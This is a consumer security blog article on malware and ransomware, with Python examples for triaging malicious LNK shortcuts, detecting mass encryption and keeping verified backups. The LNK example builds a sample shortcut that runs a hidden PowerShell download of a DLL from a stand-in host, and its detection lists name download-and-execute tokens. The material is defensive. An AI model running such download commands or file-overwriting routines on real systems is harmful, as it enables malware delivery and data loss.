Cyber attacks against private users and ways to protect against them OnlineSim
Jul 14 21:19:52, 2023
Common types of cyber attacks against private users and ways to protect against them. Part 2
In the previous article, we talked about phishing, cryptojacking and man-in-the-middle (MITM) cyber attacks.
In this article, we will discuss different types of malware and how hackers use them to steal information and money.
Before you start reading, have a look at which industries undergo the most frequent cyber attacks.
Hackers launch cyber attacks by spreading malware through email or messengers. They typically add an accompanying text to the email telling the victim about a big win, a surprise inheritance or something else that entices them to download and open the attached file or follow the provided link.
The attached file in most cases contains a malicious program. Even if the file appears safe and does not look like a suspicious RAR archive, it may still contain a virus. For example, a Word document may contain a malicious macro written in Visual Basic for Applications (VBA), the scripting language built into Microsoft Office.
When the user opens such a document, Microsoft Office prompts him/her to enable the macros. If the user agrees, malware is downloaded from the attackers' website and installed on the victim computer. The malicious program then launches, scans the network and the local disk for stored files and steals, compromises or encrypts them.
Another scenario is infection through LNK files which are commonly known as file shortcuts. In Windows, they are used as links to original files. This file type has information about the file name, location and the software with which the file can be opened.
LNK files crafted by attackers execute malicious VBScript or PowerShell commands carried in the shortcut's target and arguments. This method helps to bypass Windows security mechanisms and infect PCs.
PowerShell is a command shell and scripting engine built into Windows that can be used to:
Change settings of the operating system
Control services and processes
Configure server roles and components
Malware propagation via LNK files occurs as follows:
The victim user receives a phishing email with an attached ZIP archive. The archive contains a malicious LNK shortcut.
The user opens the archive and clicks on the shortcut, which in turn runs a PowerShell script that downloads a malicious DLL containing a loader.
The loader allocates a region of memory, loads the DLL into it and decrypts a specific resource inside it.
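The LNK delivery chain above (ZIP attachment, shortcut that starts PowerShell with a hidden window, download of a DLL) can be triaged without ever opening the attachment, because a shortcut is just a binary record of its target and arguments. The following added example, written for this article and not taken from OnlineSim or any product, is a small parser for the shell link header and its string fields (field offsets and flag values are taken from the public MS-SHLLINK format description) plus a triage rule set that flags the indicators described above. The sample ZIP, the file names, the `example.invalid` host and the argument strings are all constructed for the demonstration; nothing in the archive is executed.

```python
import io
import struct
import zipfile

# Shell link header constants (MS-SHLLINK): header size, the fixed CLSID, and the LinkFlags bits.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the target minimised, i.e. out of the user's sight
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

def parse_lnk(data: bytes) -> dict:
    """Parse the ShellLinkHeader and the StringData section of a .lnk file."""
    if len(data) < 76:
        raise ValueError("too short for a shell link header")
    header_size, clsid = struct.unpack_from("<I16s", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip the IDList: 2-byte size followed by the items
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:  # skip LinkInfo: its size is its first dword
        off += struct.unpack_from("<I", data, off)[0]
    info = {"flags": flags, "show_command": show_command}
    for bit, name in STRING_FIELDS:  # each string: 2-byte character count, then the characters
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        off += count * width
        info[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
    return info

def triage_lnk(info: dict, filename: str = "") -> list:
    """Indicators a defender looks for in an e-mailed shortcut; returns a list of findings."""
    findings = []
    target = (info.get("relative_path", "") + " " + info.get("working_dir", "")).lower()
    args = info.get("arguments", "").lower()
    if "powershell" in target or "powershell" in args:
        findings.append("launches PowerShell")
    if any(t in args for t in ("-enc", "-encodedcommand", "frombase64string")):
        findings.append("encoded command line")
    if any(t in args for t in ("-w hidden", "-windowstyle hidden", "-nop", "-noprofile")):
        findings.append("hidden window or profile bypass")
    if any(t in args for t in ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile",
                               "invoke-expression", "iex ", "iex(")):
        findings.append("downloads or runs remote content")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window starts minimised (SW_SHOWMINNOACTIVE)")
    stem = filename.lower()[:-4] if filename.lower().endswith(".lnk") else ""
    if "." in stem:
        findings.append("double extension disguises the shortcut as a document")
    return findings

def scan_zip(zip_bytes: bytes) -> dict:
    """Report findings for every .lnk inside a ZIP attachment; nothing is executed."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for member in zf.infolist():
            if not member.filename.lower().endswith(".lnk"):
                continue
            try:
                report[member.filename] = triage_lnk(parse_lnk(zf.read(member)), member.filename)
            except ValueError as exc:
                report[member.filename] = ["unparseable: %s" % exc]
    return report

def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Constructed sample .lnk: header + RELATIVE_PATH + COMMAND_LINE_ARGUMENTS, Unicode strings."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    def string_data(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + string_data(relative_path) + string_data(arguments)

def build_sample_zip() -> bytes:
    """Constructed sample attachment: one disguised PowerShell shortcut and one harmless shortcut."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice.pdf.lnk", build_lnk(
            r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            '-nop -w hidden -c "Invoke-WebRequest http://example.invalid/l.dll -OutFile $env:TEMP\\l.dll"',
            show_command=SW_SHOWMINNOACTIVE))
        zf.writestr("Readme.lnk", build_lnk(r"..\Documents\readme.txt", ""))
    return buf.getvalue()

if __name__ == "__main__":
    for name, findings in scan_zip(build_sample_zip()).items():
        print(name, "->", findings or ["no indicators"])
```

The parser only walks the header and string fields, skipping the IDList and LinkInfo blocks by their declared sizes, which is enough to read the target path, working directory and arguments that a mail gateway or an analyst needs. Real shortcuts may also carry ExtraData blocks after the strings; they are ignored here because none of the indicators depend on them.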
There are several kinds of malware, as described below.
A rootkit is malware that attacks a victim computer and enables remote control over it, most often without being detected by the user or an antivirus.
If a user installs a rootkit, the attackers can remotely launch files, steal the user's files, install other malware and control the infected computer as part of a botnet. A rootkit can also modify the software installed on the victim computer, including the software that is supposed to detect it.
Spyware attacks victim machines and stealthily monitors user actions. Such malicious programs can collect data about the user's cyber activity, log the keystrokes, collect information about accounts, logins, passwords and financial data.
Spyware, just like rootkits, in most cases changes the security settings of PCs or browsers. It is commonly spread in combination with Trojans, using social engineering or phishing techniques.
Social engineering is a cyber security threat and method of acquiring the victim user's confidential information through psychological manipulation. The acquired information is used to withdraw money from the victim’s bank card, gain control over the victim's accounts or pressure him/her to do something.
Trojans are a type of malware that infiltrates computers under the guise of a regular and safe application. Trojans act surreptitiously and lull the users into a false sense of security, just like the Trojan horse that was given as a present to the inhabitants of Troy in ancient Greece.
Unlike viruses and worms, which spread on their own, a Trojan can capture information only after a user has installed it. Once downloaded and installed, Trojans can give the attackers remote access to the victim computer, steal information such as credentials, financial data and even electronic money, or install other malicious applications.
For a detailed technical description of how the Trojan operated, which codes and system commands it used, please see the Microsoft security writeup. Provided below is a diagram of how it worked.
A virus is another kind of malware that can replicate itself and propagate between computers. Viruses can spread via documents, web scripts or applications. They are used for stealing information or money, creating botnets, hidden mining etc.
Worms are among the most common types of malware. They replicate by spreading copies of themselves across a network through exploitation of operating system vulnerabilities. They are usually used to launch cyber attacks against host networks and damage them by congesting bandwidth and overloading servers. Sometimes, worms contain code to steal data from computers, delete files or create botnets.
Worms propagate across networks using two mechanisms:
Exploitation of security vulnerabilities and administration errors in installed software. Such worms can propagate automatically by launching attacks against computers on their own.
Social engineering, when the attackers trick a person into running a malicious program. Such worms are most often distributed through spam mailings, social networks etc.
There is another classification of worms according to their mechanism of propagation:
Email worms propagate via emails
IM worms propagate via instant messengers such as Facebook Messenger, Skype or WhatsApp
IRC worms propagate via IRC (Internet Relay Chat) channels. Internet Relay Chat is a text-based chat protocol that allows users to connect to a server using a dedicated client, join channels or chats and exchange messages in real time by typing them on the keyboard.
Net worms or network worms propagate across networks and do not rely on the user as a link in their distribution chain.
P2P worms propagate via peer-to-peer file sharing networks, such as Kazaa, Grokster, eDonkey, FastTrack or Gnutella.
Ransomware is a type of malware that attacks the victim computer, blocks access to it or encrypts data on it. To get the computer back to its previous working state, victims are required to pay a ransom.
Several hundred million such attacks occur per year, according to analysis by Statista.
Most of such attacks are launched via an email containing malicious links to the attackers' website. When users follow the link, they download the malware. Alternatively, the email may contain an attachment with a malicious file that will download the ransomware as soon as the user opens it.
There are two types of ransomware. A description of each type follows.
The first type, non-encrypting ransomware, attacks the victim computer and blocks its most basic functions: for example, it can partially disable the mouse and keyboard and/or restrict access to the desktop. The computer remains in this state until the victim pays the ransom to the hackers' account.
Non-encrypting ransomware is not always dangerous, as such malicious programs usually do not aim to steal important files. Their goal is simply to block the victim device and wait for the ransom.
The second type, encrypting ransomware, attacks the victim computer and encrypts important data on it, such as personal information or photos, without affecting the computer's operation. Here the hackers play on the victim's fear: the user can see that the files are still physically on the computer, but cannot use them.
Files are typically encrypted using the AES algorithm with a key size of 128, 192 or 256 bits. Such a key is practically impossible to recover by brute-force search. Some ransomware programs also use public-key cryptography, such as RSA.
To learn more about encryption and how it works, read the article "What is VPN and how it works".
When the files are encrypted, a window is displayed to the victim with a message such as "Pay the ransom within an hour, or all encrypted files will be deleted". Thus, the user is pushed to pay the ransom to have his/her files decrypted.
However, even when the victim has paid the ransom, there are no guarantees he/she will receive the decryption key from the attackers. So, there is a risk that the files can remain encrypted forever.
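Because encrypting ransomware leaves the files in place but replaces their contents with ciphertext, the encryption is visible on disk before any ransom note appears: the byte distribution of each file becomes nearly uniform, file names gain unfamiliar extensions, and a "how to decrypt" note shows up in each folder. The following added example, written for this article and not code from OnlineSim or any security product, turns those three observations into a simple scanner. The entropy threshold, the extension list, the note-name heuristic and the sample folders are all constructed assumptions for the demonstration; random bytes stand in for AES output, whose byte distribution is statistically indistinguishable from random.

```python
import math
import os
import tempfile
from collections import Counter

# Formats that are high-entropy by design (compressed or already encrypted) and must not raise an alert.
KNOWN_MAGIC = {b"PK\x03\x04": "zip/docx/xlsx", b"\x89PNG": "png", b"\xff\xd8\xff": "jpeg",
               b"%PDF": "pdf", b"\x1f\x8b": "gzip"}
RANSOM_EXT_HINTS = (".locked", ".encrypted", ".crypt", ".enc")  # assumed examples, not a complete list
ENTROPY_THRESHOLD = 7.5  # bits per byte; plain text sits around 4-5, ciphertext approaches 8.0

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def classify_file(path: str, sample_size: int = 65536) -> str:
    """'compressed-known', 'encrypted-like' or 'plain', judged from the first sample_size bytes."""
    with open(path, "rb") as fh:
        head = fh.read(sample_size)
    if any(head.startswith(magic) for magic in KNOWN_MAGIC):
        return "compressed-known"
    return "encrypted-like" if shannon_entropy(head) >= ENTROPY_THRESHOLD else "plain"

def scan_tree(root: str) -> dict:
    """Walk a folder and count the three indicators of mass encryption."""
    stats = {"files": 0, "encrypted_like": 0, "ransom_ext": 0, "ransom_notes": 0}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            lower = name.lower()
            stats["files"] += 1
            if lower.endswith(RANSOM_EXT_HINTS):
                stats["ransom_ext"] += 1
            if "readme" in lower and ("decrypt" in lower or "restore" in lower):
                stats["ransom_notes"] += 1
            if classify_file(os.path.join(dirpath, name)) == "encrypted-like":
                stats["encrypted_like"] += 1
    return stats

def is_likely_ransomware_activity(stats: dict, ratio: float = 0.5) -> bool:
    """Alert when most files look encrypted, or when ransom extensions or notes are present."""
    if stats["files"] == 0:
        return False
    return (stats["encrypted_like"] / stats["files"] >= ratio
            or stats["ransom_ext"] > 0 or stats["ransom_notes"] > 0)

def build_sample_tree(encrypted: bool) -> str:
    """Constructed sample: a folder of notes, either intact or as it looks after encryption."""
    root = tempfile.mkdtemp(prefix="docs_")
    for i in range(5):
        if encrypted:
            # Ciphertext stand-in: random bytes under a renamed file, as an encrypting ransomware leaves them.
            with open(os.path.join(root, "photo%d.jpg.locked" % i), "wb") as fh:
                fh.write(os.urandom(4096))
        else:
            with open(os.path.join(root, "photo%d.txt" % i), "w") as fh:
                fh.write("Holiday notes, day %d: " % i + "lorem ipsum " * 200)
    if encrypted:
        with open(os.path.join(root, "README_TO_DECRYPT.txt"), "w") as fh:
            fh.write("Pay the ransom within an hour, or all encrypted files will be deleted.")
    return root

if __name__ == "__main__":
    for label, encrypted in (("intact folder", False), ("after encryption", True)):
        stats = scan_tree(build_sample_tree(encrypted))
        print(label, stats, "ALERT" if is_likely_ransomware_activity(stats) else "ok")
```

The magic-number allow-list matters in practice: photos, PDFs and Office documents are compressed and would otherwise trip the entropy check, so the scanner excludes them by signature and relies on the ratio of suspicious files rather than any single file. A periodic run of this scan over a user's document folders, or the same checks applied to files written by a process in real time, is the kind of behavioural detection that catches a new ransomware family an antivirus has no signature for yet.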
How to protect against malware and ransomware
Keep your software up to date. Software vendors continually collect information about security problems and release new versions with patches addressing those problems.
Install an antivirus and have it running at all times — it will protect you against most types of attacks, such as installing malware and following dangerous links. If someone sends you a malicious application, the antivirus will block the malware. The same goes for a malicious link — the antivirus will detect it and prevent you from following it.
Better yet, don't download or run any suspicious files at all. Your antivirus may not detect some malicious programs until they run, by which time they may already have damaged an important operating system file and affected your computer's operation.
Check who sends you links. Don't click on links sent by strangers or your friends without any accompanying text. If you receive a link in the name of someone you know, contact them personally and ask them what they sent. Their account may have been hacked, and spam may be sent in their name.
Make regular backups of your system and all important files. You can copy files to physical media or to the cloud. Cloud storage is preferable to physical media, as it is protected from malware, hardware failure and similar problems.
Alternatively, you can set up automatic backups using third-party services, such as Redo Backup and Recovery, EASEUS Todo Backup Free or Cobian Backup. Remember, though, that cloud storage is not completely secure either — data leaks can occur there, too.
In 2014, for example, attackers distributed links to phishing sites; users who visited them gave away their passwords to various services, including iCloud.
As a result, naked photos of Jennifer Lawrence, Rihanna, and dozens of other celebrities were leaked. According to some estimates, the attackers hijacked 300 accounts in Apple iCloud and Gmail over the period from November 2013 to August 2014.
It should also be remembered that cloud services sometimes go down, so your information in the cloud can become unavailable for some time.
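The backup advice above is only as good as the backup's resistance to the ransomware it is meant to survive: a folder that is simply mirrored to the cloud will mirror the encrypted files too, so what protects you is keeping every earlier snapshot untouched and being able to prove a snapshot is intact before restoring from it. The following added example, written for this article and not code from OnlineSim or from any of the backup products named above, implements that pattern with the Python standard library: each run copies the source into a new snapshot folder that is never overwritten, records a SHA-256 manifest, and a restore is refused unless the manifest verifies. The sample home folder, the snapshot labels and the simulated encryption (random bytes under a `.locked` name) are constructed for the demonstration.

```python
import hashlib
import json
import os
import shutil
import tempfile
import time

def sha256_file(path: str) -> str:
    """SHA-256 hex digest of a file, read in 64 KiB chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def create_snapshot(source_dir: str, backup_root: str, label: str = "") -> str:
    """Copy source_dir into a fresh snapshot folder (older snapshots are never touched) and write a manifest."""
    snap = os.path.join(backup_root, "snapshot-" + (label or time.strftime("%Y%m%dT%H%M%S")))
    data_dir = os.path.join(snap, "data")
    shutil.copytree(source_dir, data_dir)  # fails rather than overwrites if the snapshot already exists
    manifest = {}
    for dirpath, _dirs, files in os.walk(data_dir):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, data_dir)] = sha256_file(full)
    with open(os.path.join(snap, "manifest.json"), "w") as fh:
        json.dump(manifest, fh, indent=2, sort_keys=True)
    return snap

def verify_snapshot(snap: str) -> list:
    """Names of files whose hash no longer matches the manifest or that are missing; [] means intact."""
    with open(os.path.join(snap, "manifest.json")) as fh:
        manifest = json.load(fh)
    data_dir = os.path.join(snap, "data")
    return sorted(rel for rel, digest in manifest.items()
                  if not os.path.isfile(os.path.join(data_dir, rel))
                  or sha256_file(os.path.join(data_dir, rel)) != digest)

def restore_snapshot(snap: str, dest: str) -> list:
    """Restore a snapshot into dest only after it verifies clean; returns the restored file names."""
    bad = verify_snapshot(snap)
    if bad:
        raise RuntimeError("refusing to restore a corrupted snapshot: %s" % bad)
    shutil.copytree(os.path.join(snap, "data"), dest, dirs_exist_ok=True)
    return sorted(os.listdir(dest))

def simulate_encryption(folder: str) -> None:
    """Constructed stand-in for ransomware: each file is replaced by random bytes and renamed .locked."""
    for name in os.listdir(folder):
        path = os.path.join(folder, name)
        with open(path + ".locked", "wb") as fh:
            fh.write(os.urandom(64))
        os.remove(path)

def demo() -> dict:
    """Back up, lose the live files to encryption, detect a damaged copy, recover from the clean snapshot."""
    src = tempfile.mkdtemp(prefix="home_")
    for i in range(3):
        with open(os.path.join(src, "notes%d.txt" % i), "w") as fh:
            fh.write("important note %d\n" % i)
    backups = tempfile.mkdtemp(prefix="backups_")
    snap1 = create_snapshot(src, backups, label="001")
    simulate_encryption(src)                              # the live data is now useless
    snap2 = create_snapshot(src, backups, label="002")    # a sync-style backup would hold only this
    with open(os.path.join(snap2, "manifest.json")) as fh:
        snap2_names = list(json.load(fh))
    # Simulate bit rot or tampering inside the second snapshot so the manifest check has something to catch.
    with open(os.path.join(snap2, "data", "notes0.txt.locked"), "wb") as fh:
        fh.write(b"corrupted")
    restored = restore_snapshot(snap1, tempfile.mkdtemp(prefix="restore_"))
    return {"snap1_intact": verify_snapshot(snap1) == [],
            "snap2_only_locked": all(n.endswith(".locked") for n in snap2_names),
            "snap2_damaged": verify_snapshot(snap2),
            "restored": restored}

if __name__ == "__main__":
    print(demo())
```

Two design points carry over to any real backup tool: snapshots are append-only, so the copy taken before the infection survives a later one taken after it, and a restore is preceded by a verification step, so a backup that was itself damaged or silently replaced is noticed before it is trusted. The same manifest can be kept on separate media from the data it describes, which is also what makes a periodic test restore meaningful.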